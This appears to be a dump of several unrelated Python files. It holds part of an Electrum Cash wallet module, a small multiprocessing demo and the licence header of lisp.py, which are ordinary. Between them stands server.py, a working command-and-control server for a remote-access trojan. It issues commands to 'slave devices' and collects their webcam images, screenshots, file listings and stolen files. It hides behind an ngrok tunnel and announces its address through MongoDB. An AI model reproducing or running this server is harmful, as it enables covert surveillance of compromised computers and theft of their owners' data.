if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
amount_text = format_satoshis(r['amount'])
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if not 'index_url' in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self, write=True):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.save_labels() # In case address labels were set or cleared.
if write:
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True, save=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
if save:
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message, save=save) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True,
save=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None, save=save)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
if save:
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.change_reserved.clear()
self.change_reserved_default.clear()
self.change_unreserved.clear()
self.change_reserved_tmp.clear()
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_change_reservations()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
multip.py
|
from multiprocessing import Process, Value
import os
def info(title):
print(title)
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
def f(name):
info('function f')
print('hello', name)
if __name__ == '__main__':
info('main line')
p = Process(target=f, args=('bob',))
p.start()
p.join()
|
server.py
|
import numpy
import os
import json
from flask import *
from threading import Thread
import requests
import pymongo
from werkzeug.utils import secure_filename
api = Flask(__name__)
# this array includes the device name and the command code of the command to be executed
cmdArray = {'deviceName': '', 'command': 0, 'data': ''}
# this array contains the output of all console commands
shellArr = {'shell': ''}
# initiates mongodb
client = pymongo.MongoClient("mongodb+srv://{username}:{password}@cluster0.qajos.mongodb.net/myFirstDatabase?retryWrites=true&w=majority")
conn = client.main
col = conn.server
# for screenshot and webcam pic
@api.route('/webcam-ss', methods=['POST'])
def ss():
file = request.files['file']
if file.filename != '':
filename = secure_filename(file.filename)
file.save(os.path.join(os.getcwd(), filename))
else:
return 'error'
cmdArray['command'] = 0
cmdArray['deviceName'] = ''
cmdArray['data'] = ''
return 'success'
# manages file browser commands and response
@api.route('/browse-files', methods=['POST'])
def browse_files():
global shellArr
req = request.data.decode("utf-8")
final = numpy.asarray(json.loads(req)['data'])
# appends new data
shellArr['shell'] = str(final)
cmdArray['command'] = 0
cmdArray['deviceName'] = ''
cmdArray['data'] = ''
return 'success'
# saves the file that is sent by the client
@api.route('/save-file', methods=['POST'])
def save_file():
# saves the received file locally
file = request.files['file']
if file.filename != '':
filename = secure_filename(file.filename)
file.save(os.path.join(os.getcwd(), filename))
else:
return 'error'
cmdArray['command'] = 0
cmdArray['deviceName'] = ''
cmdArray['data'] = ''
return 'success'
# takes command from the master command center
@api.route('/command', methods=['POST'])
def cmd():
req = request.data.decode("utf-8")
# checks if master command center credentials are correct
if str(json.loads(req)['admin']) == 'admin':
if str(json.loads(req)['id']) == '1':
# updates the array with command to be executed along with the command id
cmdArray['deviceName'] = str(json.loads(req)['deviceName'])
cmdArray['command'] = 1
cmdArray['data'] = str(json.loads(req)['data'])
return 'success'
if str(json.loads(req)['id']) == '2':
# updates the array with command to be executed along with the command id
cmdArray['deviceName'] = str(json.loads(req)['deviceName'])
cmdArray['command'] = 2
cmdArray['data'] = str(json.loads(req)['data'])
return 'success'
if str(json.loads(req)['id']) == '3':
# updates the array with command to be executed along with the command id
cmdArray['deviceName'] = str(json.loads(req)['deviceName'])
cmdArray['command'] = 3
cmdArray['data'] = str(json.loads(req)['data'])
return 'success'
if str(json.loads(req)['id']) == '4':
# updates the array with command to be executed along with the command id
cmdArray['deviceName'] = str(json.loads(req)['deviceName'])
cmdArray['command'] = 4
cmdArray['data'] = str(json.loads(req)['data'])
return 'success'
else:
return 'fail'
# this is used by slave devices to check if there are any commands to be executed
@api.route('/check', methods=['GET'])
def check():
return jsonify(cmdArray)
# returns shell data
@api.route('/get-data', methods=['GET'])
def get_data():
return jsonify(shellArr)
# adds client computer name to the database
@api.route('/add', methods=['POST'])
def add():
req = request.data.decode("utf-8")
col0 = conn.slave
array = list(col0.find({'id': json.loads(req)['id']}))
if str(array) == '[]':
mydict = { "id": json.loads(req)['id'] }
col0.insert_one(mydict)
try:
if array[0]['id'] == None:
mydict = { "id": str(array[0]['id']) }
mydict0 = {"$set": { "id": json.loads(req)['id'] } }
col0.update_one(mydict, mydict0)
except:
pass
else:
mydict = { "id": str(array[0]['id']) }
mydict0 = {"$set": { "id": json.loads(req)['id'] } }
col0.update_one(mydict, mydict0)
return 'success'
# initiates ngrok
def main():
os.system('"ngrok http 3000 -host-header="localhost:3000" --log=stdout > ngrok.log &"')
# creates and updates new public url to mongodb
def mongo():
# creates ngrok url
def ngrok_url():
url = "http://127.0.0.1:4040/api/tunnels"
try:
response = requests.get(url)
url_new_https = response.json()["tunnels"][0]["public_url"]
return str(url_new_https)
except:
ngrok_url()
# updates mongodb cluster with new ngrok url
array = list(col.find({'p63': 'p63'}))
if str(array) == '[]':
mydict = { 'p63': 'p63', "server": ngrok_url() }
col.insert_one(mydict)
try:
if array[0]['server'] == None:
mydict = { "server": str(array[0]['server']) }
mydict0 = {"$set": { "server": ngrok_url() } }
col.update_one(mydict, mydict0)
except:
pass
else:
mydict = { "server": str(array[0]['server']) }
mydict0 = {"$set": { "server": ngrok_url() } }
col.update_one(mydict, mydict0)
if __name__ == '__main__':
Thread(target = main).start()
mongo()
api.run(host='localhost', port='3000')
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
